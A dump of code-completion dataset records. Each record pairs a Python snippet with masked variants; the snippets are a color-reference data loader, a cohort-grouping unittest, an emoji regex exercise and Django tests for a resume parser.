string.punctuation)))# filter to take out punctuation\n df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use\n\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n\n return df_final, le\n\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)\n print(\"length colors and contents\", len(df['colors']), len(df['contents']))\n print(\"set colors and contents\", len(set(df['colors'])), len(set(df['contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances\n # row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()\n meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix\n\n for i in range(len(meaning_mat[:,0])):\n if sum(meaning_mat[i,:]) == 0:\n print(\"meaning mat is 0 for this row: \", i)\n for j in range(len(meaning_mat[0,:])):\n if meaning_mat[i,j] == 0:\n print(\"meaning mat is 0 at: \", i,j,\" !!!\")\n return meaning_mat, colors_le\n\n\n\n\n# Literal listener data function\n\n\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n # return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i,u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)\n colors = (correct, alt1, alt2)\n # idxs = random.choice([0,1,2]) # randomly permute colors\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes\n output.append((correct_idx, colors_shuff, utt))\n return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc\n\n# Literal Speaker data function - hi r u ok\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)\n output.append([color, utt])\n\n return output # [referent, utterance_idx]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from unittest.case import TestCase
from datetime import datetime
from src.main.domain.Cohort import Cohort
from src.main.domain.Group import Group
from src.main.util.TimeFormatter import TimeFormatter
__author__ = 'continueing'
class CohortTest(TestCase):
def testAnalyzeNewGroups(self):
cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)
groups = cohort.groups
group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname="5월 1째 주")
self.assertEqual(groups[0].period, group.period)
group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname="5월 2째 주")
self.assertEqual(groups[1].period, group.period)
group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname="5월 3째 주")
self.assertEqual(groups[2].period, group.period)
group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname="5월 4째 주")
self.assertEqual(groups[3].period, group.period)
self.assertEqual(groups.__len__(),4)
def testSnapshots(self):
self.fail("should test this! but take too long network time")
|
normal
|
{
"blob_id": "f12bdfc054e62dc244a95daad9682790c880f20d",
"index": 5367,
"step-1": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-3": "<mask token>\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-4": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n",
"step-5": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)\n groups = cohort.groups\n\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname=\"5월 1째 주\")\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname=\"5월 2째 주\")\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname=\"5월 3째 주\")\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname=\"5월 4째 주\")\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(),4)\n\n def testSnapshots(self):\n self.fail(\"should test this! but take too long network time\")\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import re
pattern1 = r"[:]{2}[A-Z][a-z]{2,}[:]{2}|[\*]{2}[a-zA-Z]{3,}[\*]{2}"
pattern2 = r"([0-9]+)"
data = input()
valid_emojis = re.findall(pattern1, data)
numbers_ascii = re.findall(pattern2, data)
numbers_total = ""
for num in numbers_ascii:
numbers_total += num
cool_threshold = 1
for i in numbers_total:
i = int(i)
cool_threshold *= i
print(f"Cool threshold: {cool_threshold}")
cool_emoji = []
for j in valid_emojis:
sum_ch = 0
for ch in j:
if ch == "*" or ch == ":":
continue
sum_ch += ord(ch)
if sum_ch > cool_threshold:
cool_emoji.append(j)
print(f"{len(valid_emojis)} emojis found in the text. The cool ones are:")
print(*cool_emoji,sep='\n')
|
normal
|
{
"blob_id": "c2201a281ccd0833b0d7d2219d97ce3175fb012b",
"index": 2042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor num in numbers_ascii:\n numbers_total += num\n<mask token>\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\n<mask token>\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-3": "<mask token>\npattern1 = '[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\\\*]{2}[a-zA-Z]{3,}[\\\\*]{2}'\npattern2 = '([0-9]+)'\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\nnumbers_total = ''\nfor num in numbers_ascii:\n numbers_total += num\ncool_threshold = 1\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\ncool_emoji = []\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-4": "import re\npattern1 = '[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\\\*]{2}[a-zA-Z]{3,}[\\\\*]{2}'\npattern2 = '([0-9]+)'\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\nnumbers_total = ''\nfor num in numbers_ascii:\n numbers_total += num\ncool_threshold = 1\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\nprint(f'Cool threshold: {cool_threshold}')\ncool_emoji = []\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == '*' or ch == ':':\n continue\n sum_ch += ord(ch)\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\nprint(f'{len(valid_emojis)} emojis found in the text. The cool ones are:')\nprint(*cool_emoji, sep='\\n')\n",
"step-5": "import re\n\npattern1 = r\"[:]{2}[A-Z][a-z]{2,}[:]{2}|[\\*]{2}[a-zA-Z]{3,}[\\*]{2}\"\npattern2 = r\"([0-9]+)\"\ndata = input()\nvalid_emojis = re.findall(pattern1, data)\nnumbers_ascii = re.findall(pattern2, data)\n\nnumbers_total = \"\"\n\nfor num in numbers_ascii:\n numbers_total += num\n\ncool_threshold = 1\n\nfor i in numbers_total:\n i = int(i)\n cool_threshold *= i\n\n\nprint(f\"Cool threshold: {cool_threshold}\")\n\ncool_emoji = []\n\nfor j in valid_emojis:\n sum_ch = 0\n for ch in j:\n if ch == \"*\" or ch == \":\":\n continue\n sum_ch += ord(ch)\n\n if sum_ch > cool_threshold:\n cool_emoji.append(j)\n\nprint(f\"{len(valid_emojis)} emojis found in the text. The cool ones are:\")\nprint(*cool_emoji,sep='\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from collections import Counter
import generator.resume_parser as resume_parser
import os
import json
class TestResumeParser(TestCase):
def load_resume(self, resume_name):
path_to_directory = "generator/fixtures/{resume_name}.pdf".format(resume_name=resume_name)
file_path = os.path.abspath(path_to_directory)
json_string = resume_parser.convert(file_path)
json_file = json.loads(json_string)
return json_file
def convert_to_counter(self, json_file):
counter = json_file["counter"]
return Counter(counter)
def generate_counter(self, resume_name):
json_file = self.load_resume(resume_name)
return self.convert_to_counter(json_file)
def generate_name(self, resume_name):
json_file = self.load_resume(resume_name)
return json_file["name"]
def generate_email(self, resume_name):
json_file = self.load_resume(resume_name)
return json_file["email"]
def test_parse_tariq_ali_profile_counter(self):
expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3, 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1, 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})
actual_counter = self.generate_counter("TariqAliProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_tariq_ali_profile_name(self):
expected_name = "Tariq Ali"
actual_name = self.generate_name("TariqAliProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_tariq_ali_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("TariqAliProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_second_tariq_ali_profile_counter(self):
expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3, 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++': 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1, '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1, 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})
actual_counter = self.generate_counter("Tariq_Ali")
self.assertEqual(expected_counter, actual_counter)
def test_parse_second_tariq_ali_profile_name(self):
expected_name = "Tariq\xa0Ali"
actual_name = self.generate_name("Tariq_Ali")
self.assertEqual(expected_name, actual_name)
def test_parse_second_tariq_ali_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("Tariq_Ali")
self.assertEqual(expected_email, actual_email)
def test_parse_dan_bernier_profile_counter(self):
expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3, 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1, 'Scheme': 1})
actual_counter = self.generate_counter("DanBernierProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_dan_bernier_profile_name(self):
expected_name = "Dan Bernier"
actual_name = self.generate_name("DanBernierProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_dan_bernier_profile_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("DanBernierProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_dylan_hirschkorn_profile_counter(self):
expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC': 3, 'C#': 2, 'Swift': 1})
# This is a bug, Dylan only mentioned "Visual Basic", not "Basic" on his resume. However, I do not know of a good way of fixing this specific edge case. Also, Dylan is the name of a programming language, which is why Dylan shows up in the counter.
actual_counter = self.generate_counter("DylanHirschkornProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_dylan_hirschkorn_profile_name(self):
expected_name = "Dylan Hirschkorn"
actual_name = self.generate_name("DylanHirschkornProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_dylan_hirschkorn_profile_email(self):
expected_email = ""
actual_email = self.generate_email("DylanHirschkornProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_sean_dugan_murphy_profile_counter(self):
expected_counter = Counter({'Swift': 11, 'Twitter': 3, 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2, 'CSS': 1, 'C#': 1})
actual_counter = self.generate_counter("SeanDuganMurphyProfile")
self.assertEqual(expected_counter, actual_counter)
def test_parse_sean_dugan_murphy_profile_name(self):
# The full name of the candidate is Sean Dugan Murphy. However we assume that a candidate only has a first and last name...and ignore the edge case where a candidate has a middle name.
expected_name = "Sean Dugan"
actual_name = self.generate_name("SeanDuganMurphyProfile")
self.assertEqual(expected_name, actual_name)
def test_parse_sean_dugan_murphy_profile_email(self):
expected_email = ""
actual_email = self.generate_email("SeanDuganMurphyProfile")
self.assertEqual(expected_email, actual_email)
def test_parse_christopher_salat_ceev_counter(self):
# Note that Christopher Salat does not actually know either PHP or Scratch. He links to several websites that end with the .php extension and he serves as a Scratch DJ. This indicates a problem with relying solely on keywords detached from the context.
expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})
actual_counter = self.generate_counter("Christopher_Salat_Ceev")
self.assertEqual(expected_counter, actual_counter)
def test_parse_christopher_salat_ceev_name(self):
expected_name = "Christopher Salat"
actual_name = self.generate_name("Christopher_Salat_Ceev")
self.assertEqual(expected_name, actual_name)
def test_parse_christopher_salat_ceev_email(self):
expected_email = "[email protected]"
actual_email = self.generate_email("Christopher_Salat_Ceev")
self.assertEqual(expected_email, actual_email)
|
normal
|
{
"blob_id": "4bbfb35e4b03e2bfd46dd0fe5bfd54fb01ba11df",
"index": 1996,
"step-1": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n <mask token>\n <mask token>\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n <mask token>\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n <mask token>\n <mask token>\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n <mask token>\n <mask token>\n <mask token>\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n <mask token>\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n <mask token>\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n <mask token>\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-3": "<mask token>\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter 